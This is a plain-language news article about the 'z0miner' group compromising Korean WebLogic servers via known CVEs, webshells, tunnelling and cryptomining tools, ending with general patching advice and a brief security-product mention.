Recent cybersecurity work has found a very skilled group called “z0miner” that is attacking Korean WebLogic servers a lot. They use many harmful tools, including ones for mining cryptocurrency and controlling systems from afar. This shows a big change in online threats, making it harder to protect important computer systems in Asia. The attackers break into systems by finding and using weaknesses, putting in harmful programs called webshells, and using various tools to keep control over the systems they hack.
Experts in cybersecurity have discovered that z0miner takes advantage of poor security settings and servers that are too open to the public. They look for specific versions of server software that they can attack with special tools. By using a known weak spot in Oracle WebLogic servers, known as CVE-2020-14882, z0miner can get inside the network. They put in a type of harmful file called a JSP webshell to start taking over. They used three kinds of webshells but didn’t get caught by the security programs that are supposed to stop them.
After getting into the system, z0miner uses different tools to spread their control. They use something called FRP (Fast Reverse Proxy) to get past network defenses, making it easier to connect to desktops from far away. Another tool, NetCat, lets them send commands to the servers they’ve taken over. They also use XMRig to make money by mining cryptocurrency using the power of the infected servers. Interestingly, they also use AnyDesk, which is usually a safe program, to get into systems where they find specific weaknesses, like CVE-2023-46604 in Apache ActiveMQ.
The rise in z0miner’s attacks shows that online threats are changing and getting stronger, which means companies, especially those running important services, need to be very careful. They should quickly fix any known weaknesses and use better security programs. Perimeter81 is one example of a good security program that can stop many kinds of online attacks, helping to keep networks safe from groups like z0miner.
This situation reminds us that cybercriminals keep trying to attack important services. As these bad actors get smarter and try new targets, it’s very important to stay ahead with good security practices. Fighting online threats is an ongoing effort that needs everyone to be alert, fix problems fast, and use a strong mix of security steps to protect against complex attacks.